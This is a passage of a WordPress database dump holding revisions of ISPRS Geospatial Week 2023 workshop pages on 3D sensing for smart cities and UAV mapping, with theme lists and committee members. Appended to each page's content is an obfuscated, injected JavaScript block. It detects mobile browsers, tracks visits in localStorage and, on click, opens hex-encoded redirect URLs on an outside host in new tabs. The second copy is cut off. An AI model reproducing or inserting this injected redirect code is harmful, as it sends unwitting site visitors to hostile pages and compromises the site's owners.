soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"38\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:brown;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Airborne photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Airborne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Mobile LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS-based photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS borne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning methods for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Low-cost multi-sensor systems for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor system design and on-board processing</strong></h6>\n</li>\n<li>\n<h6><strong>Cross-modality sensing data integration</strong></h6>\n</li>\n<li>\n<h6><strong>Ubiquitous sensing with sensors in mobile devices</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor fusion in support of smart city applications</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:brown;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Andrea Lingua, Polytechnic University of Turin, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Jiaojiao Tian, German Aerospace Center (DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Rongjun Qin, Ohio State University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Cheng Wang, Chinese Academy of Sciences, China</strong></h6>\n</li>\n<li>\n<h6><strong>Chun Liu, Tongji University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Yan Xia, Technical University of Munich, Germany</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','3DS Smart Cities - 3D Sensing for Smart Cities','','inherit','closed','closed','','2572-revision-v1','','','2023-02-05 11:07:24','2023-02-05 11:07:24','',2572,'https://gsw2023.com/?p=3807',0,'revision','',0),
(3808,1,'2023-02-05 11:14:16','2023-02-05 11:14:16','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2575\" img_size=\"230x230\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\">UAV-based mapping with imaging and LiDAR systems: challenges, data processing, and applications</span></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will seek contributions covering advanced topics related to the state of the art and future trends in 3D mapping using imaging and LiDAR units onboard Uncrewed Aerial Vehicles (UAVs). The growing interest in 3D mapping using sensing modalities onboard UAVs is motivated by continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning). Among others, solicited papers will cover the following topics: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][dt_team_carousel order=\"asc\" posts_offset=\"0\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"39\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"sky\" style=\"shadow\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_separator border_width=\"5\"][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Multi-rotor, fixed-wing, and hybrid UAVs</strong></h6>\n</li>\n<li>\n<h6><strong>System calibration</strong></h6>\n</li>\n<li>\n<h6><strong>Georeferencing: direct, indirect, and integrated sensor orientation</strong></h6>\n</li>\n<li>\n<h6><strong>Structure form motion</strong></h6>\n</li>\n<li>\n<h6><strong>Data analytics for LiDAR point clouds</strong></h6>\n</li>\n<li>\n<h6><strong>Visual and LiDAR SLAM</strong></h6>\n</li>\n<li>\n<h6><strong>UAV mapping applications</strong></h6>\n</li>\n<li>\n<h6><strong>UAV mapping in GNSS-challenging/denied environments</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor fusion in support of UAV navigation and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Deep Learning strategies in support UAV mapping activities</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization of UAV data and products</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of UAV data with geospatial data from high-altitude and terrestrial platforms</strong></h6>\n</li>\n<li>\n<h6><strong>Creating benchmark training datasets for deep learning strategies</strong></h6>\n</li>\n<li>\n<h6><strong>Quality assurance and quality control of UAV mapping</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Mohamed Mostafa, Trimble</strong></h6>\n</li>\n<li>\n<h6><strong>Adel Moussa, UofC</strong></h6>\n</li>\n<li>\n<h6><strong>Kai-Wei Cheng, National Cheng Kung University, Taiwan</strong></h6>\n</li>\n<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 